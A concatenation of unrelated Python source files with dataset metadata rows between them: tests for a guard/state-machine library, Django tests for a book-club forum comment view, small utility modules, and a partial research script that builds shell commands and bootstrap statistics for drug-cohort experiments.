def test_evaluate_and_guard(self) -> None:
g = AndGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
self.assertFalse(g.evaluate(0))
self.assertFalse(g.evaluate(1))
self.assertFalse(g.evaluate(2))
self.assertTrue(g.evaluate(3))
def test_evaluate_or_guard(self) -> None:
g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
self.assertFalse(g.evaluate(0))
self.assertTrue(g.evaluate(1))
self.assertTrue(g.evaluate(2))
self.assertTrue(g.evaluate(3))
def test_evaluate_complex_guard(self) -> None:
# (!G1 || ((!G2 || G3) && G1))
g = OrGuard(NotGuard(Helpers.TestGuard('G1')), AndGuard(OrGuard(NotGuard(Helpers.TestGuard('G2')), Helpers.TestGuard('G3')), Helpers.TestGuard('G1')))
self.assertTrue(g.evaluate(0))
self.assertTrue(g.evaluate(1))
self.assertTrue(g.evaluate(2))
self.assertFalse(g.evaluate(3))
self.assertTrue(g.evaluate(4))
self.assertTrue(g.evaluate(5))
self.assertTrue(g.evaluate(6))
self.assertTrue(g.evaluate(7))
def test_evaluate_guard_with_custom_bit_index(self) -> None:
g = Helpers.TestGuard('G1')
bit_index = {'G1' : 5}
for i in range(0, 31):
self.assertFalse(g.evaluate(i, bit_index))
self.assertTrue(g.evaluate(32, bit_index))
def test_guard_lineno(self) -> None:
g1 = SimpleGuard('G1', 1234)
g2 = SimpleGuard('G2', 4321)
self.assertEqual(1234, g1.lineno())
self.assertEqual(1234, NotGuard(g1).lineno())
self.assertEqual(1234, OrGuard(g1, g2).lineno())
self.assertEqual(4321, OrGuard(g2, g1).lineno())
self.assertEqual(1234, AndGuard(g1, g2).lineno())
self.assertEqual(4321, AndGuard(g2, g1).lineno())
def test_all_events_of_state(self) -> None:
it1 = InternalTransition(event='E1', action=Action('A1'))
it2 = InternalTransition(event='E2', action=Action('A2'))
st1 = StateTransition(event='E3', toState='S2')
st2 = StateTransition(event='E4', toState='S2')
st3 = StateTransition(event='E4', toState='S3')
s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3]);
self.assertEqual(4, len(s.events()))
self.assertIn('E1', s.events())
self.assertIn('E2', s.events())
self.assertIn('E3', s.events())
self.assertIn('E4', s.events())
def test_all_guard_conditions_for_event(self) -> None:
it1 = InternalTransition(event='E2', action=Action('A2'), guard=Helpers.TestGuard('G1'))
st1 = StateTransition(event='E2', toState='S2', guard=AndGuard(NotGuard(Helpers.TestGuard('G1')), Helpers.TestGuard('G2')))
s = State(name='S', lineno=0, internal_transitions=[it1], state_transitions=[st1]);
self.assertEqual(0, len(s.guard_conditions_for_event('E1')))
self.assertEqual(2, len(s.guard_conditions_for_event('E2')))
self.assertIn('G1', s.guard_conditions_for_event('E2'))
self.assertIn('G2', s.guard_conditions_for_event('E2'))
def test_all_internal_transitions_for_event(self) -> None:
it1 = InternalTransition(event='E1', action=Action('A1'))
it2 = InternalTransition(event='E2', action=Action('A2'))
st1 = StateTransition(event='E1', toState='S2')
st2 = StateTransition(event='E4', toState='S2')
st3 = StateTransition(event='E4', toState='S3')
s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3]);
self.assertEqual(1, len(s.internal_transitions_for_event('E1')))
it = s.internal_transitions_for_event('E1')
def test_all_state_transitions_for_event(self) -> None:
it1 = InternalTransition(event='E1', action=Action('A1'))
it2 = InternalTransition(event='E2', action=Action('A2'))
st1 = StateTransition(event='E1', toState='S2')
st2 = StateTransition(event='E4', toState='S2')
st3 = StateTransition(event='E4', toState='S3')
s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3]);
self.assertEqual(1, len(s.state_transitions_for_event('E1')))
st = s.state_transitions_for_event('E1')
def test_action_prototype_and_invocation_strings(self) -> None:
a1 = Action(name='A1', type=ActionType.INT, value='10')
a2 = Action(name='A2', type=ActionType.FLOAT, value='12.34')
a3 = Action(name='A3', type=ActionType.BOOL, value='true')
a4 = Action(name='A4', type=ActionType.STRING, value='"Test123"')
a5 = Action(name='A5')
self.assertEqual('void A1(int i)', a1.prototype_string())
self.assertEqual('A1(10)', a1.invocation_string())
self.assertEqual('void A2(float f)', a2.prototype_string())
self.assertEqual('A2(12.34f)', a2.invocation_string())
self.assertEqual('void A3(bool b)', a3.prototype_string())
self.assertEqual('A3(true)', a3.invocation_string())
self.assertEqual('void A4(const char* s)', a4.prototype_string())
self.assertEqual('A4("Test123")', a4.invocation_string())
self.assertEqual('void A5()', a5.prototype_string())
self.assertEqual('A5()', a5.invocation_string())
if __name__ == '__main__':
unittest.main(verbosity=2)
| 48.461153 | 158 | 0.663477 | 2,532 | 19,336 | 4.877962 | 0.063191 | 0.022346 | 0.098777 | 0.099749 | 0.816695 | 0.77435 | 0.720832 | 0.699134 | 0.678326 | 0.65517 | 0 | 0.051863 | 0.175321 | 19,336 | 398 | 159 | 48.582915 | 0.722626 | 0.001448 | 0 | 0.532468 | 0 | 0 | 0.041388 | 0 | 0 | 0 | 0 | 0 | 0.493506 | 0 | null | null | 0 | 0.012987 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5eab5cad05373385d5a1b82e2723fe44b5a1809d | 7,184 | py | Python | BookClub/tests/views/forum_views/test_create_forum_comment.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 4 | 2022-02-04T02:11:48.000Z | 2022-03-12T21:38:01.000Z | BookClub/tests/views/forum_views/test_create_forum_comment.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | 51 | 2022-02-01T18:56:23.000Z | 2022-03-31T15:35:37.000Z | BookClub/tests/views/forum_views/test_create_forum_comment.py | amir-rahim/BookClubSocialNetwork | b69a07cd33592f700214252a64c7c1c53845625d | [
"MIT"
] | null | null | null | """Unit testing for Create Forum Comment view"""
from django.contrib import messages
from django.contrib.messages import get_messages
from django.test import TestCase, tag
from django.urls import reverse
from BookClub.models import User, ForumPost, Club, ForumComment
from BookClub.tests.helpers import reverse_with_next
@tag('views', 'forum', 'create_comment')
class CreateCommentViewTestCase(TestCase):
"""Tests of the Create Comments view."""
fixtures = [
'BookClub/tests/fixtures/default_users.json',
'BookClub/tests/fixtures/default_clubs.json',
'BookClub/tests/fixtures/default_memberships.json',
'BookClub/tests/fixtures/default_forum.json',
'BookClub/tests/fixtures/default_posts.json',
]
def setUp(self):
self.club = Club.objects.get(pk=1)
self.user = User.objects.get(username="johndoe")
self.global_post = ForumPost.objects.get(pk=1)
self.url = reverse('create_forum_comment', kwargs={
"post_id": self.global_post.pk
})
self.club_post = ForumPost.objects.get(pk=4)
self.club_url = reverse('create_forum_comment',
kwargs={
"club_url_name": self.club.club_url_name,
"post_id": self.club_post.pk
})
self.post = {
"content": "HELLO, HOW DO YOU DO!",
}
def test_create_comment_url(self):
self.client.login(username=self.user.username, password="Password123")
self.assertEqual(self.url, '/forum/'+str(self.global_post.pk)+'/comment/')
def test_create_club_comment_url(self):
self.client.login(username=self.user.username, password="Password123")
self.assertEqual(self.club_url, '/club/'+str(self.club.club_url_name)+'/forum/'+str(self.club_post.pk)+'/comment/')
def test_redirect_when_not_logged_in(self):
redirect_url = reverse_with_next('login', self.url)
response = self.client.post(self.url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
def test_redirect_club_when_not_logged_in(self):
redirect_url = reverse_with_next('login', self.club_url)
response = self.client.post(self.club_url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
def test_create_post_when_not_logged_in(self):
post_count_before = ForumComment.objects.count()
redirect_url = reverse_with_next('login', self.url)
response = self.client.post(self.url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
self.assertTemplateUsed(response, 'authentication/login.html')
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before)
def test_create_club_comment_when_not_logged_in(self):
post_count_before = ForumComment.objects.count()
redirect_url = reverse_with_next('login', self.club_url)
response = self.client.post(self.club_url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
self.assertTemplateUsed(response, 'authentication/login.html')
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before)
def test_create_comment_when_logged_in(self):
self.client.login(username=self.user.username, password="Password123")
redirect_url = reverse('forum_post', kwargs={"post_id": self.global_post.pk})
post_count_before = ForumComment.objects.count()
response = self.client.post(self.url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before+1)
def test_create_club_comment_when_logged_in(self):
self.client.login(username=self.user.username, password="Password123")
redirect_url = reverse('forum_post', kwargs={"club_url_name": self.club.club_url_name, "post_id": self.club_post.pk})
post_count_before = ForumComment.objects.count()
response = self.client.post(self.club_url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before+1)
def test_create_invalid_comment(self):
self.client.login(username=self.user.username, password="Password123")
redirect_url = reverse('forum_post', kwargs={"post_id": self.global_post.pk})
post_count_before = ForumComment.objects.count()
self.post['content'] = "x" * 1025
response = self.client.post(self.url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=200, fetch_redirect_response=True
)
messages_list = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertEqual(str(messages_list[0]), "There was an error making that comment, try again!")
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before)
def test_create_invalid_post_id(self):
self.client.login(username=self.user.username, password="Password123")
redirect_url = reverse('forum_post', kwargs={"post_id": 1000})
self.url = reverse('create_forum_comment', kwargs={
"post_id": 1000
})
post_count_before = ForumComment.objects.count()
response = self.client.post(self.url, self.post, follow=True)
self.assertRedirects(response, redirect_url,
status_code=302, target_status_code=404, fetch_redirect_response=True
)
messages_list = list(get_messages(response.wsgi_request))
self.assertEqual(len(messages_list), 1)
self.assertEqual(messages_list[0].level, messages.ERROR)
self.assertEqual(str(messages_list[0]), "There was an error making that comment, try again!")
post_count_after = ForumComment.objects.count()
self.assertEqual(post_count_after, post_count_before) | 52.057971 | 125 | 0.663836 | 851 | 7,184 | 5.3396 | 0.125734 | 0.047535 | 0.039613 | 0.038732 | 0.847271 | 0.788952 | 0.779489 | 0.775968 | 0.775968 | 0.756602 | 0 | 0.016161 | 0.233435 | 7,184 | 138 | 126 | 52.057971 | 0.80897 | 0.010718 | 0 | 0.561983 | 0 | 0 | 0.103142 | 0.037481 | 0 | 0 | 0 | 0 | 0.198347 | 1 | 0.090909 | false | 0.049587 | 0.049587 | 0 | 0.157025 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0d647df4440aabf6ed9a5fa9badebc4db34e8bf6 | 255 | py | Python | shrimpy/allocation.py | cwm9cwm9/shrimpy-python | 8edabbf1c06a29e73d9bf0a30db82bf48d9ef2a5 | [
"MIT"
] | 128 | 2019-07-10T06:31:54.000Z | 2022-03-06T04:25:39.000Z | shrimpy/allocation.py | johnjdailey/shrimpy-python | 10a942b14dd88102564460d60c25cc10123fc448 | [
"MIT"
] | 16 | 2020-04-29T12:31:18.000Z | 2021-12-03T03:33:31.000Z | shrimpy/allocation.py | johnjdailey/shrimpy-python | 10a942b14dd88102564460d60c25cc10123fc448 | [
"MIT"
] | 41 | 2019-10-29T20:51:22.000Z | 2022-03-14T03:44:11.000Z | class Allocation():
def __init__(self, symbol, percent):
self.symbol = symbol
self.percent = percent
def get_api_format(self):
return {
'symbol': self.symbol,
'percent': self.percent
}
| 21.25 | 40 | 0.541176 | 25 | 255 | 5.28 | 0.44 | 0.227273 | 0.257576 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.356863 | 255 | 11 | 41 | 23.181818 | 0.804878 | 0 | 0 | 0 | 0 | 0 | 0.05098 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0.111111 | 0.444444 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
219a3eff205c2b8c6525abb37bcc5753e1dd9e5e | 20 | py | Python | block/__init__.py | bbatalo/block | 3fb1c68aa8a5c84c75ccf4cb89b046777b4e8737 | [
"MIT"
] | null | null | null | block/__init__.py | bbatalo/block | 3fb1c68aa8a5c84c75ccf4cb89b046777b4e8737 | [
"MIT"
] | null | null | null | block/__init__.py | bbatalo/block | 3fb1c68aa8a5c84c75ccf4cb89b046777b4e8737 | [
"MIT"
] | null | null | null | from .block import * | 20 | 20 | 0.75 | 3 | 20 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
21ab1e9663a221f03b2825948d206ebbd65be39b | 201 | py | Python | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import dependencies.grako.test
if __name__ == '__main__':
dependencies.grako.test.main()
| 28.714286 | 82 | 0.761194 | 24 | 201 | 5.75 | 0.75 | 0.246377 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00565 | 0.119403 | 201 | 6 | 83 | 33.5 | 0.774011 | 0.104478 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
df16b4a8e57177e2e18f17c537ba9b44cd2f035e | 91,881 | py | Python | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | 1 | 2021-07-07T19:47:12.000Z | 2021-07-07T19:47:12.000Z | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | null | null | null | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | null | null | null | import os
import shutil
import zipfile
import torch
import torch.utils.data
from dataset import *
import pickle
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import matplotlib.ticker as tck
import numpy as np
import csv
from collections import Counter, defaultdict
import pandas as pd
from utils import check_and_mkdir
from scipy import stats
import re
import itertools
import functools
import random
import seaborn as sns
print = functools.partial(print, flush=True)
MAX_NO_UNBALANCED_FEATURE = 0
MIN_SUCCESS_RATE = 0.5 # 0.1
MIN_SUPPORT = MIN_SUCCESS_RATE * 100
# 5
# 5
print('Global MAX_NO_UNBALANCED_FEATURE: ', MAX_NO_UNBALANCED_FEATURE)
np.random.seed(0)
random.seed(0)
def IQR(s):
return [np.quantile(s, .5), np.quantile(s, .25), np.quantile(s, .75)]
def stringlist_2_list(s):
r = s.strip('][').replace(',', ' ').split()
r = list(map(float, r))
return r
def stringlist_2_str(s, percent=False, digit=-1):
r = s.strip('][').replace(',', ' ').split()
r = list(map(float, r))
if percent:
r = [x * 100 for x in r]
if digit == 0:
rr = ','.join(['{:.0f}'.format(x) for x in r])
elif digit == 1:
rr = ','.join(['{:.1f}'.format(x) for x in r])
elif digit == 2:
rr = ','.join(['{:.2f}'.format(x) for x in r])
elif digit == 3:
rr = ','.join(['{:.1f}'.format(x) for x in r])
else:
rr = ','.join(['{}'.format(x) for x in r])
return rr
def boot_matrix(z, B):
"""Bootstrap sample
Returns all bootstrap samples in a matrix"""
z = np.array(z).flatten()
n = len(z) # sample size
idz = np.random.randint(0, n, size=(B, n)) # indices to pick for all boostrap samples
return z[idz]
def bootstrap_mean_ci(x, B=1000, alpha=0.05):
n = len(x)
# Generate boostrap distribution of sample mean
xboot = boot_matrix(x, B=B)
sampling_distribution = xboot.mean(axis=1)
quantile_confidence_interval = np.percentile(sampling_distribution, q=(100 * alpha / 2, 100 * (1 - alpha / 2)))
std = sampling_distribution.std()
# if plot:
# plt.hist(sampling_distribution, bins="fd")
return quantile_confidence_interval, std
def bootstrap_mean_pvalue(x, expected_mean=0., B=1000):
"""
Ref:
1. https://en.wikipedia.org/wiki/Bootstrapping_(statistics)#cite_note-:0-1
2. https://www.tau.ac.il/~saharon/StatisticsSeminar_files/Hypothesis.pdf
3. https://github.com/mayer79/Bootstrap-p-values/blob/master/Bootstrap%20p%20values.ipynb
4. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html?highlight=one%20sample%20ttest
Bootstrap p values for one-sample t test
Returns boostrap p value, test statistics and parametric p value"""
n = len(x)
orig = stats.ttest_1samp(x, expected_mean)
# Generate boostrap distribution of sample mean
x_boots = boot_matrix(x - x.mean() + expected_mean, B=B)
x_boots_mean = x_boots.mean(axis=1)
t_boots = (x_boots_mean - expected_mean) / (x_boots.std(axis=1, ddof=1) / np.sqrt(n))
p = np.mean(t_boots >= orig[0])
p_final = 2 * min(p, 1 - p)
# Plot bootstrap distribution
# if plot:
# plt.figure()
# plt.hist(x_boots_mean, bins="fd")
return p_final, orig
def bootstrap_mean_pvalue_2samples(x, y, equal_var=False, B=1000):
"""
Bootstrap hypothesis testing for comparing the means of two independent samples
Ref:
1. https://en.wikipedia.org/wiki/Bootstrapping_(statistics)#cite_note-:0-1
2. https://www.tau.ac.il/~saharon/StatisticsSeminar_files/Hypothesis.pdf
3. https://github.com/mayer79/Bootstrap-p-values/blob/master/Bootstrap%20p%20values.ipynb
4. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html?highlight=one%20sample%20ttest
Bootstrap p values for one-sample t test
Returns boostrap p value, test statistics and parametric p value"""
n = len(x)
orig = stats.ttest_ind(x, y, equal_var=equal_var)
pooled_mean = np.concatenate((x, y), axis=None).mean()
xboot = boot_matrix(x - x.mean() + pooled_mean,
B=B) # important centering step to get sampling distribution under the null
yboot = boot_matrix(y - y.mean() + pooled_mean, B=B)
sampling_distribution = stats.ttest_ind(xboot, yboot, axis=1, equal_var=equal_var)[0]
if np.isnan(orig[1]):
p_final = np.nan
else:
# Calculate proportion of bootstrap samples with at least as strong evidence against null
p = np.mean(sampling_distribution >= orig[0])
# RESULTS
# print("p value for null hypothesis of equal population means:")
# print("Parametric:", orig[1])
# print("Bootstrap:", 2 * min(p, 1 - p))
p_final = 2 * min(p, 1 - p)
return p_final, orig
def shell_for_ml(cohort_dir_name, model, niter=50, min_patients=500, stats=True, more_para=''):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
fo = open('shell_{}_{}.sh'.format(model, cohort_dir_name), 'w') # 'a'
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
# load others:
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
added_drug = []
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
added_drug.extend(rx)
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
added_drug.extend(gpi)
print('len(added_drug): ', len(added_drug))
print(added_drug)
fo.write('mkdir -p output_marketscan/{}/{}/log\n'.format(cohort_dir_name, model))
n = 0
for x in name_cnt:
k, v = x
if (v >= min_patients) or (k in added_drug):
drug = k.split('.')[0]
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_marketscan_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding rxnorm --med_code_topk 200 {} {} " \
"2>&1 | tee output_marketscan/{}/{}/log/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed, '--stats' if stats else '', more_para,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n += 1
fo.close()
print('In total ', n, ' commands')
def shell_for_ml_marketscan(cohort_dir_name, model, niter=50, min_patients=500, stats=True, more_para='', selected=False):
if not selected:
cohort_size = pickle.load(
open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
else:
d = pd.read_excel(r'../iptw/output_marketscan/{}/selected_drug_list.xlsx'.format(cohort_dir_name),
dtype={'drug':str})
name_cnt = []
for index, row in d.iterrows():
drug = row['drug']
n = row['n_treat']
name_cnt.append([drug, n])
fo = open('shell_{}_{}_marketscan.sh'.format(model, cohort_dir_name), 'w') # 'a'
fo.write('mkdir -p output_marketscan/{}/{}/log\n'.format(cohort_dir_name, model))
n_cmd = n_drug = 0
for x in name_cnt:
k, v = x
if (v >= min_patients):
drug = k.split('.')[0]
n_drug += 1
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding gpi --med_code_topk 200 {} {} " \
"2>&1 | tee output_marketscan/{}/{}/log/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed, '--stats' if stats else '', more_para,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n_cmd += 1
fo.close()
print('In total ', n_drug, 'dugs ', n_cmd, ' commands')
def shell_for_ml_marketscan_stats_exist(cohort_dir_name, model, niter=10, min_patients=500):
cohort_size = pickle.load(
open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
fo = open('shell_{}_{}_marketscan_stats_exist.sh'.format(model, cohort_dir_name), 'w') # 'a'
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
# load others:
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
added_drug = []
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
added_drug.extend(rx)
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
added_drug.extend(gpi)
print('len(added_drug): ', len(added_drug))
print(added_drug)
fo.write('mkdir -p output_marketscan/{}/{}/log_stats_exit\n'.format(cohort_dir_name, model))
n = 0
for x in name_cnt:
k, v = x
if (v >= min_patients) or (k in added_drug):
drug = k.split('.')[0]
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding gpi --med_code_topk 200 --stats --stats_exit " \
"2>&1 | tee output_marketscan/{}/{}/log_stats_exit/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n += 1
fo.close()
print('In total ', n, ' commands')
def split_shell_file(fname, divide=2, skip_first=1):
f = open(fname, 'r')
content_list = f.readlines()
n = len(content_list)
n_d = np.ceil((n - skip_first) / divide)
seg = [0, ] + [int(i * n_d + skip_first) for i in range(1, divide)] + [n]
for i in range(divide):
fout_name = fname.split('.')
fout_name = ''.join(fout_name[:-1]) + '-' + str(i) + '.' + fout_name[-1]
fout = open(fout_name, 'w')
for l in content_list[seg[i]:seg[i + 1]]:
fout.write(l)
fout.close()
print('dump done')
def results_model_selection_for_ml(cohort_dir_name, model, drug_name, niter=50):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
drug_list_all = [drug.split('.')[0] for drug, cnt in name_cnt]
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
drug_in_dir = set([x for x in os.listdir(dirname) if x.isdigit()])
drug_list = [x for x in drug_list_all if x in drug_in_dir] # in order
check_and_mkdir(dirname + 'results/')
for drug in drug_list:
results = []
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
fname = dirname + drug + "/{}_S{}D200C{}_{}".format(drug, seed, ctrl_type, model)
try:
df = pd.read_csv(fname + '_ALL-model-select.csv')
except:
print('No file exisits: ', fname + '_ALL-model-select.csv')
# 1. selected by AUC
dftmp = df.sort_values(by=['val_auc', 'i'], ascending=[False, True])
val_auc = dftmp.iloc[0, dftmp.columns.get_loc('val_auc')]
val_auc_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_auc_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 2. selected by val_max_smd_iptw
dftmp = df.sort_values(by=['val_max_smd_iptw', 'i'], ascending=[True, True])
val_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('val_max_smd_iptw')]
val_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 3. selected by val_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['val_n_unbalanced_feat_iptw', 'i'], ascending=[True, False]) # [True, True]
val_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('val_n_unbalanced_feat_iptw')]
val_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
val_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 4. selected by train_max_smd_iptw
dftmp = df.sort_values(by=['train_max_smd_iptw', 'i'], ascending=[True, True])
train_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('train_max_smd_iptw')]
train_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
train_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 5. selected by train_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['train_n_unbalanced_feat_iptw', 'i'],
ascending=[True, False]) # [True, True]
train_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('train_n_unbalanced_feat_iptw')]
train_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
train_nsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 6. selected by trainval_max_smd_iptw
dftmp = df.sort_values(by=['trainval_max_smd_iptw', 'i'], ascending=[True, True])
trainval_maxsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_max_smd_iptw')]
trainval_maxsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
trainval_maxsmd_testauc = dftmp.iloc[0, dftmp.columns.get_loc('test_auc')]
# 7. selected by trainval_n_unbalanced_feat_iptw
dftmp = df.sort_values(by=['trainval_n_unbalanced_feat_iptw', 'i'],
ascending=[True, False]) # [True, True]
trainval_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('trainval_n_unbalanced_feat_iptw')]
trainval_nsmd_nsmd = dftmp.iloc[0, dftmp.columns.get_loc('all_n_unbalanced_feat_iptw')]
